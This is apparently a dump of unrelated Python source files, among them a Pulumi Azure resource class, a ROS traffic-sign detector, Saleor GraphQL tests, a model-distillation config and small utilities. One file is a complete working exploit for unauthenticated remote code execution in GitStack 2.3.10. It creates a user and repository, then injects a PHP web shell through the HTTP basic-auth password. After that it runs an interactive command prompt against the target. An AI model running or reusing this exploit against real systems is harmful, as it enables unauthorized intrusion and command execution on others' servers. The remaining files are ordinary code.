fr_min, fr_max = frames.min(), frames.max()
if not (0 <=
(fr_min - self.buffer_startframe)
< len(self.buffer)):
self.buffer_around(fr_min)
elif not (0 <=
(fr_max - self.buffer_startframe)
< len(self.buffer)):
self.buffer_around(fr_max)
try:
result = np.zeros((len(tt),self.nchannels))
indices = frames - self.buffer_startframe
result[in_time] = self.buffer[indices]
return result
except IndexError as error:
raise IOError("Error in file %s, "%(self.filename)+
"At time t=%.02f-%.02f seconds, "%(tt[0], tt[-1])+
"indices wanted: %d-%d, "%(indices.min(), indices.max())+
"but len(buffer)=%d\n"%(len(self.buffer))+ str(error))
else:
ind = int(self.fps*tt)
if ind<0 or ind> self.nframes: # out of time: return 0
return np.zeros(self.nchannels)
if not (0 <= (ind - self.buffer_startframe) <len(self.buffer)):
# out of the buffer: recenter the buffer
self.buffer_around(ind)
# read the frame in the buffer
return self.buffer[ind - self.buffer_startframe]
def buffer_around(self,framenumber):
"""
Fills the buffer with frames, centered on ``framenumber``
if possible
"""
# inicia-frame for the buffer
new_bufferstart = max(0, framenumber - self.buffersize // 2)
if (self.buffer is not None):
current_f_end = self.buffer_startframe + self.buffersize
if (new_bufferstart <
current_f_end <
new_bufferstart + self.buffersize):
# We already have one bit of what must be read
conserved = current_f_end - new_bufferstart + 1
chunksize = self.buffersize-conserved
array = self.read_chunk(chunksize)
self.buffer = np.vstack([self.buffer[-conserved:], array])
else:
self.seek(new_bufferstart)
self.buffer = self.read_chunk(self.buffersize)
else:
self.seek(new_bufferstart)
self.buffer = self.read_chunk(self.buffersize)
self.buffer_startframe = new_bufferstart
def __del__(self):
self.close_proc()
|
py | b40023f7cfd0ceb9fa83cf715049cc6c76e0e953 | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['DeploymentAtManagementGroupScope']
class DeploymentAtManagementGroupScope(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
deployment_name: Optional[pulumi.Input[str]] = None,
group_id: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
properties: Optional[pulumi.Input[pulumi.InputType['DeploymentPropertiesArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Deployment information.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] deployment_name: The name of the deployment.
:param pulumi.Input[str] group_id: The management group ID.
:param pulumi.Input[str] location: The location to store the deployment data.
:param pulumi.Input[pulumi.InputType['DeploymentPropertiesArgs']] properties: The deployment properties.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Deployment tags
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['deployment_name'] = deployment_name
if group_id is None and not opts.urn:
raise TypeError("Missing required property 'group_id'")
__props__['group_id'] = group_id
__props__['location'] = location
if properties is None and not opts.urn:
raise TypeError("Missing required property 'properties'")
__props__['properties'] = properties
__props__['tags'] = tags
__props__['name'] = None
__props__['type'] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:resources/v20200801:DeploymentAtManagementGroupScope"), pulumi.Alias(type_="azure-native:resources:DeploymentAtManagementGroupScope"), pulumi.Alias(type_="azure-nextgen:resources:DeploymentAtManagementGroupScope"), pulumi.Alias(type_="azure-native:resources/latest:DeploymentAtManagementGroupScope"), pulumi.Alias(type_="azure-nextgen:resources/latest:DeploymentAtManagementGroupScope"), pulumi.Alias(type_="azure-native:resources/v20190501:DeploymentAtManagementGroupScope"), pulumi.Alias(type_="azure-nextgen:resources/v20190501:DeploymentAtManagementGroupScope"), pulumi.Alias(type_="azure-native:resources/v20190510:DeploymentAtManagementGroupScope"), pulumi.Alias(type_="azure-nextgen:resources/v20190510:DeploymentAtManagementGroupScope"), pulumi.Alias(type_="azure-native:resources/v20190701:DeploymentAtManagementGroupScope"), pulumi.Alias(type_="azure-nextgen:resources/v20190701:DeploymentAtManagementGroupScope"), pulumi.Alias(type_="azure-native:resources/v20190801:DeploymentAtManagementGroupScope"), pulumi.Alias(type_="azure-nextgen:resources/v20190801:DeploymentAtManagementGroupScope"), pulumi.Alias(type_="azure-native:resources/v20191001:DeploymentAtManagementGroupScope"), pulumi.Alias(type_="azure-nextgen:resources/v20191001:DeploymentAtManagementGroupScope"), pulumi.Alias(type_="azure-native:resources/v20200601:DeploymentAtManagementGroupScope"), pulumi.Alias(type_="azure-nextgen:resources/v20200601:DeploymentAtManagementGroupScope"), pulumi.Alias(type_="azure-native:resources/v20201001:DeploymentAtManagementGroupScope"), pulumi.Alias(type_="azure-nextgen:resources/v20201001:DeploymentAtManagementGroupScope")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(DeploymentAtManagementGroupScope, __self__).__init__(
'azure-native:resources/v20200801:DeploymentAtManagementGroupScope',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'DeploymentAtManagementGroupScope':
"""
Get an existing DeploymentAtManagementGroupScope resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["location"] = None
__props__["name"] = None
__props__["properties"] = None
__props__["tags"] = None
__props__["type"] = None
return DeploymentAtManagementGroupScope(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def location(self) -> pulumi.Output[Optional[str]]:
"""
the location of the deployment.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the deployment.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def properties(self) -> pulumi.Output['outputs.DeploymentPropertiesExtendedResponse']:
"""
Deployment properties.
"""
return pulumi.get(self, "properties")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Deployment tags
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
The type of the deployment.
"""
return pulumi.get(self, "type")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
|
py | b40024004d7aecaa9fb1e3e843ca88ea92ea2c20 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
import cv2
import math
import tensorflow as tf
import rospy
from sensor_msgs.msg import CompressedImage
from sensor_msgs.msg import Image
from std_msgs.msg import String
from cv_bridge import CvBridge, CvBridgeError
def fully_connected_neural_network(X, keep_prob):
W1 = tf.get_variable("W1", shape=[784, 512], initializer=tf.contrib.layers.xavier_initializer())
b1 = tf.Variable(tf.random_normal([512]))
L1 = tf.nn.relu(tf.matmul(X, W1) + b1)
L1 = tf.nn.dropout(L1, keep_prob=keep_prob)
W2 = tf.get_variable("W2", shape=[512, 512], initializer=tf.contrib.layers.xavier_initializer())
b2 = tf.Variable(tf.random_normal([512]))
L2 = tf.nn.relu(tf.matmul(L1, W2) + b2)
L2 = tf.nn.dropout(L2, keep_prob=keep_prob)
W3 = tf.get_variable("W3", shape=[512, 512], initializer=tf.contrib.layers.xavier_initializer())
b3 = tf.Variable(tf.random_normal([512]))
L3 = tf.nn.relu(tf.matmul(L2, W3) + b3)
L3 = tf.nn.dropout(L3, keep_prob=keep_prob)
W4 = tf.get_variable("W4", shape=[512, 512], initializer=tf.contrib.layers.xavier_initializer())
b4 = tf.Variable(tf.random_normal([512]))
L4 = tf.nn.relu(tf.matmul(L3, W4) + b4)
L4 = tf.nn.dropout(L4, keep_prob=keep_prob)
W5 = tf.get_variable("W5", shape=[512, 10], initializer=tf.contrib.layers.xavier_initializer())
b5 = tf.Variable(tf.random_normal([10]))
hypothesis = tf.nn.softmax(tf.matmul(L4, W5) + b5)
return hypothesis
def center(points):
center_x = (points[0][0][0] + points[1][0][0] + points[2][0][0] + points[3][0][0])/4.0
center_y = (points[0][0][1] + points[1][0][1] + points[2][0][1] + points[3][0][1])/4.0
return center_x, center_y
def find_position(points):
center_x, center_y = center(points)
index = np.zeros(4)
existance0 = 'no'
existance1 = 'no'
existance2 = 'no'
existance3 = 'no'
existanceall = 'no'
for i in range(4):
if points[i][0][0] < center_x:
if points[i][0][1] > center_y:
index[3] = i
existance3 = 'yes'
else:
index[0] = i
existance0 = 'yes'
else:
if points[i][0][1] > center_y:
index[2] = i
existance2 = 'yes'
else:
index[1] = i
existance1 = 'yes'
if existance0 == 'yes' and existance1 == 'yes' and existance2 == 'yes' and existance3 == 'yes':
existanceall = 'yes'
return existanceall, index
def find_angle(point1, point0, point2):
y1 = point1[1] - point0[1]
y2 = point2[1] - point0[1]
x1 = point1[0] - point0[0]
x2 = point2[0] - point0[0]
angle = math.atan2(y1*x2 - x1*y2, x1*x2+y1*y2)*180/np.pi
return abs(angle)
def distinguish_rectangular(screenCnt):
threshold_angle = 20
existance, index = find_position(screenCnt)
for i in range(4):
if find_angle(screenCnt[(i+0)%4][0], screenCnt[(i+1)%4][0], screenCnt[(i+2)%4][0]) > 90 + threshold_angle or find_angle(screenCnt[(i+0)%4][0], screenCnt[(i+1)%4][0], screenCnt[(i+2)%4][0]) < 90 - threshold_angle:
satisfaction_angle = 'no'
break
satisfaction_angle = 'yes'
if satisfaction_angle == 'yes' and existance == 'yes':
return 'yes'
class TrafficSignDetection():
def __init__(self):
self.X = tf.placeholder(tf.float32, [None, 784])
self.keep_prob = tf.placeholder("float")
self.Y = fully_connected_neural_network(self.X, self.keep_prob)
self.sess = tf.InteractiveSession()
init_op = tf.global_variables_initializer()
self.sess.run(init_op)
self.saver = tf.train.Saver()
self.saver.restore(self.sess, "/home/kihoon/catkin_ws/src/self_driving_turtlebot3/src/signal_sign_detection/model/model.ckpt")
self.selecting_sub_image = "raw" # you can choose image type "compressed", "raw"
# subscribers
if self.selecting_sub_image == "compressed":
self._sub = rospy.Subscriber('/image_calibrated_compressed', CompressedImage, self.callback, queue_size=1)
else:
self._sub = rospy.Subscriber('/image_calibrated', Image, self.callback, queue_size=1)
# publishers
self._pub = rospy.Publisher('/signal_sign', String, queue_size=1)
self._cv_bridge = CvBridge()
self.softmax_threshold = 0.9
def callback(self, image_msg):
if self.selecting_sub_image == "compressed":
np_arr = np.fromstring(image_msg.data, np.uint8)
image = cv2.imdecode(np_arr, cv2.IMREAD_COLOR)
else:
image = self._cv_bridge.imgmsg_to_cv2(image_msg, "bgr8")
# save original image
image_origin = np.copy(image)
# converting to gray
image_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# adding blur
image_smoothing = cv2.bilateralFilter(image_gray, 5, 5, 5)
# findign edge
image_edged = cv2.Canny(image_smoothing, 20, 100)
# making egde to be thicker
kernel = np.ones((5,5),np.uint8)
image_dilation = cv2.dilate(image_edged,kernel,iterations = 1)
#finding contours
_, cnts, hierarchy = cv2.findContours(image_dilation.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
cnts = sorted(cnts, key = cv2.contourArea, reverse = True)[:10]
screenCnt = None
area_pre = 100000
for c in cnts:
peri = cv2.arcLength(c, True)
approx = cv2.approxPolyDP(c, 0.02 * peri, True)
# do this process if contour have 4 edge
if len(approx) == 4:
screenCnt = approx
area_now = cv2.contourArea(c)
check_rectangular = distinguish_rectangular(screenCnt)
# do this process if all angles of rectangular between 70 and 110
if check_rectangular == 'yes' and area_pre - area_now < 10000:
cv2.drawContours(image, [screenCnt], -1, (0, 255, 0), 3) # drawing rectangular box
for j in range(4): # drawing circles in vertex
image = cv2.circle(image, (screenCnt[j][0][0], screenCnt[j][0][1]), 2, (0, 0, 255), thickness=3, lineType=8, shift=0)
_, index = find_position(screenCnt)
self.object_recognition(screenCnt[int(index[0])][0], screenCnt[int(index[1])][0], screenCnt[int(index[2])][0], screenCnt[int(index[3])][0], image_origin)
area_pre = area_now
screenCnt_pre = screenCnt
# showing images
cv2.imshow("image_edged", image_edged), cv2.waitKey(1)
cv2.imshow("image_dilation", image_dilation), cv2.waitKey(1)
cv2.imshow("image", image), cv2.waitKey(1)
def object_recognition(self, point1, point2, point3, point4, image_origin):
pts_src = np.array([point1, point2, point3, point4])
# Homography processing to make flat image
pts_dst = np.array([[0, 0], [149, 0], [149, 149], [0, 149]])
h, status = cv2.findHomography(pts_src, pts_dst)
cv_Homography = cv2.warpPerspective(image_origin, h, (150, 150))
# showing flat image
cv2.imshow("cv_Homography", cv_Homography), cv2.waitKey(1)
# resize and convert to numpy arrray to feed neural network
image_resize = cv2.resize(cv_Homography, (28, 28))
image_gray = cv2.cvtColor(image_resize, cv2.COLOR_BGR2GRAY)
image_reshape = np.reshape(image_gray, (1, 784))
# predicting image label using neural network
prediction = self.sess.run(self.Y, feed_dict={self.X: image_reshape, self.keep_prob: 1.0})
index = np.argmax(prediction, 1)[0]
# publishing topic
sign = ['RIGHT', 'LEFT', 'TOP', 'BOTTOM', 'UNDER20', 'UNDER50', 'STOP', 'WARNING']
if prediction[0][index] > self.softmax_threshold:
print prediction[0][index]
message = sign[index]
self._pub.publish(message)
def main(self):
rospy.spin()
if __name__ == '__main__':
rospy.init_node('signal_sign_dection')
traffic_sign_dection = TrafficSignDetection()
traffic_sign_dection.main()
|
py | b400242e3ce21e52232c150f49c3a2edbdba5da7 | from setuptools import setup, find_packages
from scheduler_failover_controller import __version__
setup(
name='scheduler_failover_controller',
description='A process that runs in unison with Apache Airflow to control the Scheduler process to ensure High Availability',
version=__version__,
packages=find_packages(),
include_package_data=True,
zip_safe=False,
scripts=['scheduler_failover_controller/bin/scheduler_failover_controller'],
install_requires=[
'apache-airflow>=1.9.0',
'kazoo>=2.2.1',
'coverage>=4.2',
'eventlet>=0.9.7',
],
extras_require={},
author='Robert Sanders',
author_email='[email protected]',
url='https://github.com/teampayoff/airflow-scheduler-failover-controller',
download_url=('https://github.com/teampayoff/airflow-scheduler-failover-controller/tarball/' + __version__)
)
|
py | b400245c06e29f178a177787537158c658f67e90 | import graphene
import pytest
from ....tests.utils import get_graphql_content
SHIPPING_METHODS_QUERY = """
query GetShippingMethods($channel: String) {
shippingZones(first: 10, channel: $channel) {
edges {
node {
shippingMethods {
id
name
minimumOrderWeight {
unit
value
}
maximumOrderWeight {
unit
value
}
type
channelListings {
id
channel {
id
name
}
}
price {
amount
currency
}
maximumOrderPrice {
currency
amount
}
minimumOrderPrice {
currency
amount
}
}
}
}
}
}
"""
@pytest.mark.django_db
@pytest.mark.count_queries(autouse=False)
def test_vouchers_query_with_channel_slug(
staff_api_client,
shipping_zones,
channel_USD,
permission_manage_shipping,
count_queries,
):
variables = {"channel": channel_USD.slug}
get_graphql_content(
staff_api_client.post_graphql(
SHIPPING_METHODS_QUERY,
variables,
permissions=[permission_manage_shipping],
check_no_permissions=False,
)
)
@pytest.mark.django_db
@pytest.mark.count_queries(autouse=False)
def test_vouchers_query_without_channel_slug(
staff_api_client,
shipping_zones,
permission_manage_shipping,
count_queries,
):
get_graphql_content(
staff_api_client.post_graphql(
SHIPPING_METHODS_QUERY,
{},
permissions=[permission_manage_shipping],
check_no_permissions=False,
)
)
EXCLUDE_PRODUCTS_MUTATION = """
mutation shippingPriceRemoveProductFromExclude(
$id: ID!, $input:ShippingPriceExcludeProductsInput!
) {
shippingPriceExcludeProducts(
id: $id
input: $input) {
errors {
field
code
}
shippingMethod {
id
excludedProducts(first:10){
totalCount
edges{
node{
id
}
}
}
}
}
}
"""
@pytest.mark.django_db
@pytest.mark.count_queries(autouse=False)
def test_exclude_products_for_shipping_method(
shipping_method,
published_collection,
product_list_published,
product_list,
categories_tree_with_published_products,
collection,
staff_api_client,
permission_manage_shipping,
):
# product_list has products with slugs slug:test-product-a, slug:test-product-b,
# slug:test-product-c
product_db_ids = [p.pk for p in product_list]
product_ids = [graphene.Node.to_global_id("Product", p) for p in product_db_ids]
expected_product_ids = [
graphene.Node.to_global_id("Product", p.pk) for p in product_list
]
shipping_method_id = graphene.Node.to_global_id(
"ShippingMethod", shipping_method.pk
)
variables = {
"id": shipping_method_id,
"input": {"products": product_ids},
}
response = staff_api_client.post_graphql(
EXCLUDE_PRODUCTS_MUTATION, variables, permissions=[permission_manage_shipping]
)
content = get_graphql_content(response)
shipping_method = content["data"]["shippingPriceExcludeProducts"]["shippingMethod"]
excluded_products = shipping_method["excludedProducts"]
total_count = excluded_products["totalCount"]
excluded_product_ids = {p["node"]["id"] for p in excluded_products["edges"]}
assert len(expected_product_ids) == total_count == 3
assert excluded_product_ids == set(expected_product_ids)
@pytest.mark.django_db
@pytest.mark.count_queries(autouse=False)
def test_exclude_products_for_shipping_method_already_has_excluded_products(
shipping_method,
product_list,
product,
staff_api_client,
permission_manage_shipping,
):
shipping_method_id = graphene.Node.to_global_id(
"ShippingMethod", shipping_method.pk
)
shipping_method.excluded_products.add(product, product_list[0])
product_ids = [graphene.Node.to_global_id("Product", p.pk) for p in product_list]
variables = {"id": shipping_method_id, "input": {"products": product_ids}}
response = staff_api_client.post_graphql(
EXCLUDE_PRODUCTS_MUTATION, variables, permissions=[permission_manage_shipping]
)
content = get_graphql_content(response)
shipping_method = content["data"]["shippingPriceExcludeProducts"]["shippingMethod"]
excluded_products = shipping_method["excludedProducts"]
total_count = excluded_products["totalCount"]
expected_product_ids = product_ids
expected_product_ids.append(graphene.Node.to_global_id("Product", product.pk))
excluded_product_ids = {p["node"]["id"] for p in excluded_products["edges"]}
assert len(expected_product_ids) == total_count
assert excluded_product_ids == set(expected_product_ids)
REMOVE_PRODUCTS_FROM_EXCLUDED_PRODUCTS_MUTATION = """
mutation shippingPriceRemoveProductFromExclude(
$id: ID!, $products: [ID]!
) {
shippingPriceRemoveProductFromExclude(
id: $id
products: $products) {
errors {
field
code
}
shippingMethod {
id
excludedProducts(first:10){
totalCount
edges{
node{
id
}
}
}
}
}
}
"""
@pytest.mark.django_db
@pytest.mark.count_queries(autouse=False)
def test_remove_products_from_excluded_products_for_shipping_method(
shipping_method,
product_list,
staff_api_client,
permission_manage_shipping,
product,
):
shipping_method_id = graphene.Node.to_global_id(
"ShippingMethod", shipping_method.pk
)
shipping_method.excluded_products.set(product_list)
shipping_method.excluded_products.add(product)
product_ids = [
graphene.Node.to_global_id("Product", product.pk),
]
variables = {"id": shipping_method_id, "products": product_ids}
response = staff_api_client.post_graphql(
REMOVE_PRODUCTS_FROM_EXCLUDED_PRODUCTS_MUTATION,
variables,
permissions=[permission_manage_shipping],
)
content = get_graphql_content(response)
shipping_method = content["data"]["shippingPriceRemoveProductFromExclude"][
"shippingMethod"
]
excluded_products = shipping_method["excludedProducts"]
total_count = excluded_products["totalCount"]
expected_product_ids = {
graphene.Node.to_global_id("Product", p.pk) for p in product_list
}
excluded_product_ids = {p["node"]["id"] for p in excluded_products["edges"]}
assert total_count == len(expected_product_ids)
assert excluded_product_ids == expected_product_ids
|
py | b40024c5f241c7e69172772cf540bc04f6be7edb | from typing import List
class Solution:
def maxCoins(self, nums: List[int]) -> int:
nums = [1] + [num for num in nums if num > 0] + [1]
n = len(nums)
m = {}
def dfs(left, right):
if left + 1 == right: return 0
if (left, right) in m: return m[(left, right)]
result = 0
for i in range(left + 1, right):
sub1 = dfs(left, i)
sub2 = dfs(i, right)
cur = nums[left] * nums[i] * nums[right] + sub1 + sub2
result = max(result, cur)
m[(left, right)] = result
return result
return dfs(0, n - 1)
nums = [3, 1, 5, 8]
s = Solution()
result = s.maxCoins(nums)
print(result)
|
py | b40024f538309982ee7f035ff998bb95b4169409 | #! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! http://waf.googlecode.com/git/docs/wafbook/single.html#_obtaining_the_waf_file
from waflib import Utils
from waflib.Configure import conf
@conf
def d_platform_flags(self):
v=self.env
if not v.DEST_OS:
v.DEST_OS=Utils.unversioned_sys_platform()
binfmt=Utils.destos_to_binfmt(self.env.DEST_OS)
if binfmt=='pe':
v['dprogram_PATTERN']='%s.exe'
v['dshlib_PATTERN']='lib%s.dll'
v['dstlib_PATTERN']='lib%s.a'
elif binfmt=='mac-o':
v['dprogram_PATTERN']='%s'
v['dshlib_PATTERN']='lib%s.dylib'
v['dstlib_PATTERN']='lib%s.a'
else:
v['dprogram_PATTERN']='%s'
v['dshlib_PATTERN']='lib%s.so'
v['dstlib_PATTERN']='lib%s.a'
DLIB='''
version(D_Version2) {
import std.stdio;
int main() {
writefln("phobos2");
return 0;
}
} else {
version(Tango) {
import tango.stdc.stdio;
int main() {
printf("tango");
return 0;
}
} else {
import std.stdio;
int main() {
writefln("phobos1");
return 0;
}
}
}
'''
@conf
def check_dlibrary(self,execute=True):
ret=self.check_cc(features='d dprogram',fragment=DLIB,compile_filename='test.d',execute=execute,define_ret=True)
if execute:
self.env.DLIBRARY=ret.strip()
|
py | b40025066d6b1a4d6a346fd2e66555b970fbf4dc | #!/usr/bin/python3
# Exploit: GitStack 2.3.10 Unauthenticated Remote Code Execution
# Date: 18.01.2018
# Software Link: https://gitstack.com/
# Category: remote
#
#1. Description
#
#$_SERVER['PHP_AUTH_PW'] is directly passed to exec function.
#
#https://security.szurek.pl/gitstack-2310-unauthenticated-rce.html
import requests
from requests.auth import HTTPBasicAuth
import os
import sys
import argparse
def arguments():
parser = argparse.ArgumentParser(description="Create command console on vulnerable GitStack installations")
parser.add_argument("--host", dest="host", required=True, help="Host to send the exploit to.")
parser.add_argument("--port", dest="port", default=-1, help="Port to use. Default 80/443", type=int)
parser.add_argument("--uri", dest="uri", default="/", help="URI where gitstack lives. Default \"/\"")
parser.add_argument("--ssl", dest="ssl", default="False", help="Use HTTPS? Default False", choices=["True","False"])
parser.add_argument("--filename", dest="filename", default="exploit.php", help="Name and path for the exploit php script on the target machine. Default: exploit.php")
parser.add_argument("--filepath", dest="filepath", default="C:/GitStack/gitphp/", help="Absolute path for the exploit file to end up on. Default: C:/GitStack/gitphp/")
args = parser.parse_args()
args.ssl = (args.ssl.upper() == "TRUE")
if args.port <= 0:
if args.ssl:
args.port = 443
else:
args.port = 80
elif args.port > 65535:
print(f"[-] Invalid port: {args.port}")
exit(-1)
return args
def main():
# 1 - Set up the target for the exploit
# 1.1 - Craft valid URL for command injection so the server doesn't complain
# 1.1.1 - Find or create a user
# 1.1.2 - Find or create a repository
# 1.1.3 - Add user to the repository
# 1.2 - inject PHP script by using a command allowing us to pass commands to the server via request parameter
# 2. - launch a shell that repeatedly sends commands to that php script
args = arguments()
host = args.host
port = args.port
uri = args.uri
ssl = args.ssl
filename = args.filename
filepath = args.filepath
proto = "http://"
if ssl:
proto = "https://"
target = f'{proto}{host}:{port}{uri}'
exploit(target, filename, filepath)
def exploit(target, filename, filepath):
repository = "rce"
username = "rce"
password = "rce"
csrf_token = "token"
user_list = []
print("[+] Get user list")
try:
r = requests.get(f"{target}rest/user/")
user_list = r.json()
user_list.remove('everyone')
print(user_list)
except:
pass
# create or find user we can upload the exploit as
if len(user_list) > 0:
username = user_list[0]
print("[+] Found user {}".format(username))
else:
print("[+] Didn't find user we can use, create one.")
print(f"[+] Create user {username}")
r = requests.post(f"{target}rest/user/", data={"username" : username, "password" : password})
if not "User created" in r.text and not "User already exist" in r.text:
print("[-] Cannot create user")
exit(-1)
# enable web interface
print("[+] Checking if web interface is up.")
r = requests.get(f"{target}rest/settings/general/webinterface/")
if "true" in r.text:
print("[+] Web repository already enabled")
else:
print("[+] Enable web repository")
r = requests.put(f"{target}rest/settings/general/webinterface/", data="{\"enabled\" : \"true\"}")
if not "Web interface successfully enabled" in r.text:
print("[-] Cannot enable web interface")
exit(-1)
# find or create a repository we can use for a valid URI
print("[+] Get repositories list")
r = requests.get(f"{target}rest/repository/")
repository_list = r.json()
print(repository_list)
if len(repository_list) > 0:
repository = repository_list[0]["name"]
print("[+] Found repository {}".format(repository))
else:
print("[+] Did not find a repository we can use")
print(f"[+] Create repository {repository}")
r = requests.post(f"{target}rest/repository/", cookies={"csrftoken" : csrf_token}, data={"name" : repository, "csrfmiddlewaretoken" : csrf_token})
if not "The repository has been successfully created" in r.text and not "Repository already exist" in r.text:
print("[-] Cannot create repository")
exit(-1)
# add found/created user to the found/created repository
print("[+] Add user to repository")
r = requests.post(f"{target}rest/repository/{repository}/user/{username}/")
if not "added to" in r.text and not "has already" in r.text:
print("[-] Cannot add user to repository")
exit(-1)
print("[+] Disable access for anyone")
r = requests.delete(f"{target}rest/repository/{repository}/user/everyone/")
if not "everyone removed from rce" in r.text and not "not in list" in r.text:
print("[-] Cannot remove access for anyone")
exit(-1)
print("[+] Create backdoor in PHP")
# default exploit, execute command
# inject command to put this into a file via valid URL we crafted by getting usernames and repositories
exploit = "<?php system($_POST['a']); ?>"
print(f"[+] Injecting PHP shell file with name {filename}")
r = requests.get(f"{target}web/index.php?p={repository}.git&a=summary", auth=HTTPBasicAuth(username, f"p && echo \"{exploit}\" > {filepath}\{filename}"))
print(r.text.encode(sys.stdout.encoding, errors="replace"))
print("[+] Starting command prompt")
print("Beware that commands that run their own session will not work. You can't lauch powershell and use it from here.")
print("Only use this as a stager and run commands that terminate!")
print("Type exit to quit.")
while True:
command = input("Command:> ")
if command.upper() == "EXIT":
exit(0)
r = requests.post(f"{target}/web/{filename}", data={"a" : command})
print(r.text.encode(sys.stdout.encoding, errors="replace").decode("ascii"))
if __name__ == "__main__":
main() |
py | b40025334aac076c23b1116c853083fc1fbaee27 | _base_ = [
'../_base_/datasets/ade20k_repeat.py',
'../_base_/default_runtime.py',
'../_base_/schedules/schedule_160k_adamw.py'
]
norm_cfg = dict(type='SyncBN', requires_grad=True)
model = dict(
type='SDModule',
cfg_s=dict(
type='EncoderDecoder',
pretrained='pretrained/mit_b0.pth',
backbone=dict(
type='mit_b0',
style='pytorch'),
decode_head=dict(
type='SegFormerHead',
in_channels=[32, 64, 160, 256],
in_index=[0, 1, 2, 3],
feature_strides=[4, 8, 16, 32],
channels=128,
dropout_ratio=0.1,
num_classes=150,
norm_cfg=norm_cfg,
align_corners=False,
decoder_params=dict(embed_dim=256),
loss_decode=dict(type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0)),
),
cfg_t=dict(
type='EncoderDecoder',
backbone=dict(
type='mit_b4',
style='pytorch'),
decode_head=dict(
type='SegFormerHead',
in_channels=[64, 128, 320, 512],
in_index=[0, 1, 2, 3],
feature_strides=[4, 8, 16, 32],
channels=128,
dropout_ratio=0.1,
num_classes=150,
norm_cfg=norm_cfg,
align_corners=False,
decoder_params=dict(embed_dim=768),
loss_decode=dict(type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0))
),
distillation = [
{'student_layer':'decode_head.linear_pred',
'teacher_layer':'decode_head.linear_pred',
'loss_name':'KLDLoss',
'loss_config':{
'weight':1,
'tau':1,
'reshape_config':'logits',
'resize_config':{'mode':'bilinear','align_corners':False},
'mask_config':False,
'transform_config':{'loss_type':'channel','group_size':15},
'ff_config':False,
'earlystop_config':112000,
},
},
{'student_layer':'decode_head.linear_pred',
'teacher_layer':'decode_head.linear_pred',
'loss_name':'KLDLoss',
'loss_config':{
'weight':1,
'tau':1,
'reshape_config':'logits',
'resize_config':{'mode':'bilinear','align_corners':False},
'mask_config':False,
'transform_config':{'loss_type':'spatial','kernel_size':64,'stride':32},
'ff_config':False,
'earlystop_config':112000,
},
},
],
s_pretrain = './pretrained/mit_b0.pth', # 学生的预训练模型
t_pretrain = './pretrained/segformer.b4.512x512.ade.160k.pth', # 老师的预训练模型
train_cfg=dict(),
test_cfg=dict(mode='whole'),
)
optimizer = dict(_delete_=True, type='AdamW', lr=0.00006, betas=(0.9,0.999), weight_decay=0.01,
paramwise_cfg=dict(custom_keys={'pos_block': dict(decay_mult=0.),
'norm': dict(decay_mult=0.),
'head': dict(lr_mult=10.)
}))
lr_config = dict(_delete_=True, policy='poly',
warmup='linear',
warmup_iters=1500,
warmup_ratio=1e-6,
power=1.0, min_lr=0.0, by_epoch=False)
work_dir = '/apdcephfs/private_inchzhang/shared_info/10.16/cg15+sg64'
data = dict(samples_per_gpu=2)
evaluation = dict(interval=16000, metric='mIoU')
# resume_from = ''
|
py | b40025f228b719a8a4a96323f417d009836fcade | # Program no 3
from datetime import datetime
# datetime object containing current date and time
now = datetime.now()
dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
print("date and time =", dt_string) |
py | b400277863dde2d6b240cefe9cd12dcff21ed3bb | # -----------------------------------------------------------------------------
# Copyright (c) 2009-2016 Nicolas P. Rougier. All rights reserved.
# Distributed under the (new) BSD License.
# -----------------------------------------------------------------------------
from . panzoom import PanZoom
from . viewport import Viewport
from . arcball import Arcball
from . trackball import Trackball
from . trackball_pan import TrackballPan
from . xyz import X,Y,Z
from . rotate import Rotate
from . position import Position
from . geoposition import GeoPosition
from . translate import Translate
